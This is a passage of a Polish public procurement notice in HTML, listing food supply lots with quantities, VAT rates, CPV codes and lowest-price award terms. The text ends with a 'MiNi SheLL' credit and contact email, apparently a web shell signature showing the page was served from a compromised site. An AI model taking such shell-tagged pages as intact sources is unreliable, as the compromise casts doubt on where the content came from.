Polewa do deserów (różne smaki)	szt.	5	23%	 
Pomidory krojone	kg.	10	8%	 
Pomidory suszone (sypkie)	kg.	20	8%	 
Powidła śliwkowe	kg.	100	8%	 
Przyprawa do zup 	l.	100	8%	 
Przyprawa Vegeta wiaderko	kg.	250	8%	 
Rodzynki 	kg.	12	8%	 
Rozmaryn	kg.	2	23%	 
Ryż biały	kg.	250	5%	 
Ryż parboiled 5kg	kg.	300	5%	 
Siemię lniane	kg.	5	23%	 
Słonecznik łuskany	kg.	5	23%	 
Smalec	kg.	10	5%	 
Sok owocowy karton 0,20 l	szt.	500	5%	 
Sok owocowy karton 2,0 l	szt.	50	23%	 
Sól	kg.	100	23%	 
Sól czosnkowa	kg.	2	23%	 
Sól potasowa	kg.	500	23%	 
Szczaw konserwowy	kg.	50	5%	 
Śliwki suszone	kg.	5	8%	 
Śmietana w aerozolu 	szt.	10	23%	 
Tymianek (opakowanie ok 20g.)	szt.	30	23%	 
Warzywko 	kg.	50	8%	 
Woda mineralna 0,5L gaz/ngaz	szt.	600	23%	 
Woda mineralna 1,5L gaz/ngaz	szt.	2 400	23%	 
Ziele angielskie	kg.	4	8%	 
Zioła prowansalskie	kg.	2	23%	 
Zupa w proszku barszcz biały (op ok 1 kg)	kg.	12	8%	 
Zupa w proszku barszcz czerwony (op ok 1 kg)	kg.	12	8%	 
Zupa w proszku borowikowa (op ok 1 kg)	kg.	12	8%	 
Zupa w proszku brokułowa (op ok 1 kg)	kg.	12	8%	 
Zupa w proszku krem z borowików (op ok 1 kg)	kg.	30	8%	 
Zupa w proszku żurek (op ok 1 kg)	kg.	80	8%	 
Żelatyna	kg.	10	8%	 
Żurawina suszona	kg.	10	8%	 
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wędliny krótko i długotrwałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Blok szynkowy	kg.	50	5%
Boczek wędzony	kg.	500	5%
Frankfurterki	kg.	150	5%
Kaszanka	kg.	20	5%
Kiełbasa biała parzona	kg.	120	5%
Kiełbasa biała surowa	kg.	60	5%
Kiełbasa golonkowa	kg.	50	5%
Kiełbasa jałowcowa	kg.	50	5%
Kiełbasa krakowska parzona	kg.	150	5%
Kiełbasa krakowska sucha	kg.	250	5%
Kiełbasa mortadela	kg.	50	5%
Kiełbasa podwawelska	kg.	150	5%
Kiełbasa słoikowa	kg.	50	5%
Kiełbasa szynkowa	kg.	150	5%
Kiełbasa śląska	kg.	850	5%
Kiełbasa tyrolska	kg.	50	5%
Kiełbasa wolińska	kg.	500	5%
Kiełbasa zwyczajna	kg.	100	5%
Kiełbaski koktajlowe	kg.	20	5%
Metka	kg.	20	5%
Mielonka	kg.	50	5%
Ogonówka	kg.	50	5%
Parówki cienkie	kg.	600	5%
Parówki grube	kg.	100	5%
Pasztet pieczony	kg.	200	5%
Pasztetowa 	kg.	50	5%
Pierś wędzona z indyka	kg.	50	5%
Polędwica drobiowa	kg.	150	5%
Polędwica sopocka	kg.	50	5%
Salceson biały	kg.	20	5%
Salceson czarny	kg.	50	5%
Serdelki	kg.	50	5%
Szynka domowa	kg.	250	5%
Szynka gotowana	kg.	200	5%
Szynka pieczona	kg.	150	5%
Szynka tyrolska	kg.	100	5%
Szynka wędzona drobiowa	kg.	50	5%
Szynkówka	kg.	100	5%
Wątrobianka	kg.	20	5%
Wędzonka krotoszyńska	kg.	20	5%
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso wieprzowe i wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek surowy	kg.	100	5%
Golonka peklowana w siatce	kg.	100	5%
Golonka tylna	kg.	100	5%
Karkówka b/k	kg.	800	5%
Kości wieprzowe schabowe	kg.	500	5%
Łopatka b/k	kg.	2 000	5%
Mięso gulaszowe	kg.	100	5%
Mięso wołowe rosołowe	kg.	50	5%
Nogi wieprzowe	kg.	50	5%
Rostbef	kg.	100	5%
Schab b/k	kg.	900	5%
Słonina	kg.	100	5%
Wątroba wieprzowa	kg.	250	5%
Wołowina zrazowa	kg.	50	5%
Żeberka wieprzowe	kg.	100	5%
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.15.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet drobiowy	kg.	1 200	5%
Filet z indyka	kg.	120	5%
Korpusy drobiowe	kg.	650	5%
Kurczak świeży	kg.	100	5%
Mięso gulaszowe drobiowe I kl	kg.	100	5%
Pierś z gęsi	kg.	50	5%
Serca drobiowe	kg.	50	5%
Skrzydełka drobiowe	kg.	100	5%
Skrzydła z indyka	kg.	50	5%
Udka drobiowe	kg.	1 600	5%
Wątróbki drobiowe	kg.	50	5%
Żołądki drobiowe	kg.	50	5%
Żołądki z indyka	kg.	50	5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Produkty głęboko mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz ukraiński	kg.	20	5%
Brokuły (2,5 kg)	kg.	150	5%
Brukselka	kg.	20	5%
Bukiet warzyw (2,5 kg)	kg.	20	5%
Fasolka zielona (2,5 kg)	kg.	100	5%
Fasolka żółta (2,5 kg)	kg.	100	5%
Flaki blanszowane 1kg	kg.	200	5%
Frytki (2,5 kg)	kg.	50	5%
Kalafior (2,5 kg)	kg.	200	5%
Kukurydza kolby	kg.	50	5%
Marchew kostka	kg.	100	5%
Marchew z groszkiem (2,5 kg)	kg.	200	5%
Mieszanka 6 składnikowa (2,5 kg)	kg.	20	5%
Mieszanka kompotowa	kg.	100	5%
Paluszki krabowe	kg.	10	8%
Porzeczka czarna	kg.	200	5%
Pyzy z mięsem 	kg.	400	5%
Pyzy ziemniaczane 	kg.	300	5%
Szczaw 	kg.	50	5%
Szpinak (2,5 kg)	kg.	100	5%
Tortilla	kg.	50	23%
Truskawki (2,5 kg)	kg.	100	5%
Warzywa na patelnie (2,5 kg)	kg.	250	5%
Włoszczyzna (2,5 kg)	kg.	50	5%
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajka kurze ok. 63g (chów ściółkowy)	szt.	34 000	5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Owoce cytrusowe, pieczarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg.	1 200	8%
Brzoskwinie import	kg.	100	5%
Cytryny	kg.	170	8%
Kiwi	kg.	150	8%
Mandarynki	kg.	250	8%
Nektarynki	kg.	200	5%
Pieczarki	kg.	350	5%
Pomarańcze	kg.	300	8%
Winogron	kg.	50	5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wyroby garmażeryjne świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gołąbki	kg.	200	5%
Kluchy parowane	kg.	200	5%
Kluski śląskie	kg.	100	5%
Kopytka	kg.	500	5%
Krokiety	kg.	200	5%
Naleśniki z serem	kg.	50	5%
Pierogi leniwe	kg.	400	5%
Pierogi ruskie	kg.	900	5%
Pierogi z kapustą	kg.	200	5%
Pierogi z mięsem	kg.	200	5%
Uszka	kg.	150	5%
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com